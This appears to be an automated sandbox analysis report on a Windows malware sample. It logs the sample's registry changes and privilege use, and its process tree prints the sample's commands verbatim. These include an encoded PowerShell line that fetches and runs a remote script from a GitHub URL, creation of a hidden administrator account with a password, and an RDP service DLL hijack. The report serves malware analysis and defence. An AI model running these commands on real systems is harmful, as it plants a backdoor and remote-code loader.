Analysis
-
max time kernel
51s -
max time network
117s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-11-2020 17:46
Static task
static1
Behavioral task
behavioral1
Sample
5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
Resource
win10v20201028
General
-
Target
5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
-
Size
3.5MB
-
MD5
7e806fd5ef516e10a4e4a5362fbc600b
-
SHA1
edb1b43d7578f170f259958663ace80a01718dc8
-
SHA256
5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b
-
SHA512
30544680de5f5af999cbbba6d632acb4319c370bf526b23cde5e8f40172b97d885608e5a9b086d1cd2df6ee97cc5bb51bb9bf74a742d5866dcca2c58b6c2dbd8
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 17 1432 powershell.exe 19 1432 powershell.exe 20 1432 powershell.exe 21 1432 powershell.exe 23 1432 powershell.exe 25 1432 powershell.exe 27 1432 powershell.exe 29 1432 powershell.exe 31 1432 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 3132 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 2316 2316 -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB744.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_qwizrqsl.50g.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB722.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB701.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_10qtnxds.3sa.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB712.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB733.tmp powershell.exe -
Modifies data under HKEY_USERS 217 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepid process 3132 powershell.exe 3132 powershell.exe 3132 powershell.exe 3132 powershell.exe 3132 powershell.exe 3132 powershell.exe 1432 powershell.exe 1432 powershell.exe 1432 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 624 624 -
Suspicious use of AdjustPrivilegeToken 77 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3132 powershell.exe Token: SeIncreaseQuotaPrivilege 3132 powershell.exe Token: SeSecurityPrivilege 3132 powershell.exe Token: SeTakeOwnershipPrivilege 3132 powershell.exe Token: SeLoadDriverPrivilege 3132 powershell.exe Token: SeSystemProfilePrivilege 3132 powershell.exe Token: SeSystemtimePrivilege 3132 powershell.exe Token: SeProfSingleProcessPrivilege 3132 powershell.exe Token: SeIncBasePriorityPrivilege 3132 powershell.exe Token: SeCreatePagefilePrivilege 3132 powershell.exe Token: SeBackupPrivilege 3132 powershell.exe Token: SeRestorePrivilege 3132 powershell.exe Token: SeShutdownPrivilege 3132 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeSystemEnvironmentPrivilege 3132 powershell.exe Token: SeRemoteShutdownPrivilege 3132 powershell.exe Token: SeUndockPrivilege 3132 powershell.exe Token: SeManageVolumePrivilege 3132 powershell.exe Token: 33 3132 powershell.exe Token: 34 3132 powershell.exe Token: 35 3132 powershell.exe Token: 36 3132 powershell.exe Token: SeIncreaseQuotaPrivilege 3132 powershell.exe Token: SeSecurityPrivilege 3132 powershell.exe Token: SeTakeOwnershipPrivilege 3132 powershell.exe Token: SeLoadDriverPrivilege 3132 powershell.exe Token: SeSystemProfilePrivilege 3132 powershell.exe Token: SeSystemtimePrivilege 3132 powershell.exe Token: SeProfSingleProcessPrivilege 3132 powershell.exe Token: SeIncBasePriorityPrivilege 3132 powershell.exe Token: SeCreatePagefilePrivilege 3132 powershell.exe Token: SeBackupPrivilege 3132 powershell.exe Token: SeRestorePrivilege 3132 powershell.exe Token: SeShutdownPrivilege 3132 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeSystemEnvironmentPrivilege 3132 powershell.exe Token: SeRemoteShutdownPrivilege 3132 powershell.exe Token: SeUndockPrivilege 3132 powershell.exe Token: SeManageVolumePrivilege 3132 powershell.exe Token: 33 3132 powershell.exe Token: 34 3132 powershell.exe Token: 35 3132 powershell.exe Token: 36 3132 powershell.exe Token: SeIncreaseQuotaPrivilege 3132 powershell.exe Token: SeSecurityPrivilege 3132 powershell.exe Token: SeTakeOwnershipPrivilege 3132 powershell.exe Token: SeLoadDriverPrivilege 3132 powershell.exe Token: SeSystemProfilePrivilege 3132 powershell.exe Token: SeSystemtimePrivilege 3132 powershell.exe Token: SeProfSingleProcessPrivilege 3132 powershell.exe Token: SeIncBasePriorityPrivilege 3132 powershell.exe Token: SeCreatePagefilePrivilege 3132 powershell.exe Token: SeBackupPrivilege 3132 powershell.exe Token: SeRestorePrivilege 3132 powershell.exe Token: SeShutdownPrivilege 3132 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeSystemEnvironmentPrivilege 3132 powershell.exe Token: SeRemoteShutdownPrivilege 3132 powershell.exe Token: SeUndockPrivilege 3132 powershell.exe Token: SeManageVolumePrivilege 3132 powershell.exe Token: 33 3132 powershell.exe Token: 34 3132 powershell.exe Token: 35 3132 powershell.exe Token: 36 3132 powershell.exe -
Suspicious use of WriteProcessMemory 72 IoCs
Processes:
5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3988 wrote to memory of 3132 3988 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe powershell.exe PID 3988 wrote to memory of 3132 3988 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe powershell.exe PID 3132 wrote to memory of 3732 3132 powershell.exe csc.exe PID 3132 wrote to memory of 3732 3132 powershell.exe csc.exe PID 3732 wrote to memory of 3188 3732 csc.exe cvtres.exe PID 3732 wrote to memory of 3188 3732 csc.exe cvtres.exe PID 3132 wrote to memory of 1424 3132 powershell.exe reg.exe PID 3132 wrote to memory of 1424 3132 powershell.exe reg.exe PID 3132 wrote to memory of 1812 3132 powershell.exe reg.exe PID 3132 wrote to memory of 1812 3132 powershell.exe reg.exe PID 3132 wrote to memory of 3684 3132 powershell.exe reg.exe PID 3132 wrote to memory of 3684 3132 powershell.exe reg.exe PID 3132 wrote to memory of 700 3132 powershell.exe net.exe PID 3132 wrote to memory of 700 3132 powershell.exe net.exe PID 700 wrote to memory of 428 700 net.exe net1.exe PID 700 wrote to memory of 428 700 net.exe net1.exe PID 3132 wrote to memory of 2128 3132 powershell.exe cmd.exe PID 3132 wrote to memory of 2128 3132 powershell.exe cmd.exe PID 2128 wrote to memory of 2064 2128 cmd.exe cmd.exe PID 2128 wrote to memory of 2064 2128 cmd.exe cmd.exe PID 2064 wrote to memory of 3828 2064 cmd.exe net.exe PID 2064 wrote to memory of 3828 2064 cmd.exe net.exe PID 3828 wrote to memory of 3996 3828 net.exe net1.exe PID 3828 wrote to memory of 3996 3828 net.exe net1.exe PID 3132 wrote to memory of 3476 3132 powershell.exe cmd.exe PID 3132 wrote to memory of 3476 3132 powershell.exe cmd.exe PID 3476 wrote to memory of 2772 3476 cmd.exe cmd.exe PID 3476 wrote to memory of 2772 3476 cmd.exe cmd.exe PID 2772 wrote to memory of 3544 2772 cmd.exe net.exe PID 2772 wrote to memory of 3544 2772 cmd.exe net.exe PID 3544 wrote to memory of 2940 3544 net.exe net1.exe PID 3544 wrote to memory of 2940 3544 net.exe net1.exe PID 2256 wrote to memory of 1784 2256 cmd.exe net.exe PID 2256 wrote to memory of 1784 2256 cmd.exe net.exe PID 1784 wrote to memory of 1184 1784 net.exe net1.exe PID 1784 wrote to memory of 1184 1784 net.exe net1.exe PID 3028 wrote to memory of 2076 3028 cmd.exe net.exe PID 3028 wrote to memory of 2076 3028 cmd.exe net.exe PID 2076 wrote to memory of 3188 2076 net.exe net1.exe PID 2076 wrote to memory of 3188 2076 net.exe net1.exe PID 3996 wrote to memory of 2128 3996 cmd.exe net.exe PID 3996 wrote to memory of 2128 3996 cmd.exe net.exe PID 2128 wrote to memory of 3600 2128 net.exe net1.exe PID 2128 wrote to memory of 3600 2128 net.exe net1.exe PID 1812 wrote to memory of 1652 1812 cmd.exe net.exe PID 1812 wrote to memory of 1652 1812 cmd.exe net.exe PID 1652 wrote to memory of 1184 1652 net.exe net1.exe PID 1652 wrote to memory of 1184 1652 net.exe net1.exe PID 3808 wrote to memory of 1288 3808 cmd.exe net.exe PID 3808 wrote to memory of 1288 3808 cmd.exe net.exe PID 1288 wrote to memory of 1092 1288 net.exe net1.exe PID 1288 wrote to memory of 1092 1288 net.exe net1.exe PID 4072 wrote to memory of 2064 4072 cmd.exe net.exe PID 4072 wrote to memory of 2064 4072 cmd.exe net.exe PID 2064 wrote to memory of 3828 2064 net.exe net1.exe PID 2064 wrote to memory of 3828 2064 net.exe net1.exe PID 2680 wrote to memory of 3732 2680 cmd.exe WMIC.exe PID 2680 wrote to memory of 3732 2680 cmd.exe WMIC.exe PID 1288 wrote to memory of 3708 1288 cmd.exe WMIC.exe PID 1288 wrote to memory of 3708 1288 cmd.exe WMIC.exe PID 3996 wrote to memory of 3820 3996 cmd.exe cmd.exe PID 3996 wrote to memory of 3820 3996 cmd.exe cmd.exe PID 3820 wrote to memory of 1432 3820 cmd.exe powershell.exe PID 3820 wrote to memory of 1432 3820 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe"C:\Users\Admin\AppData\Local\Temp\5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2dtkmchj\2dtkmchj.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4CFD.tmp" "c:\Users\Admin\AppData\Local\Temp\2dtkmchj\CSC461E9C65B98B431FB3A9C62BD813267E.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc UeT3dGaB /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc UeT3dGaB /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc UeT3dGaB /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc UeT3dGaB1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc UeT3dGaB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc UeT3dGaB3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
- Suspicious use of WriteProcessMemory
-
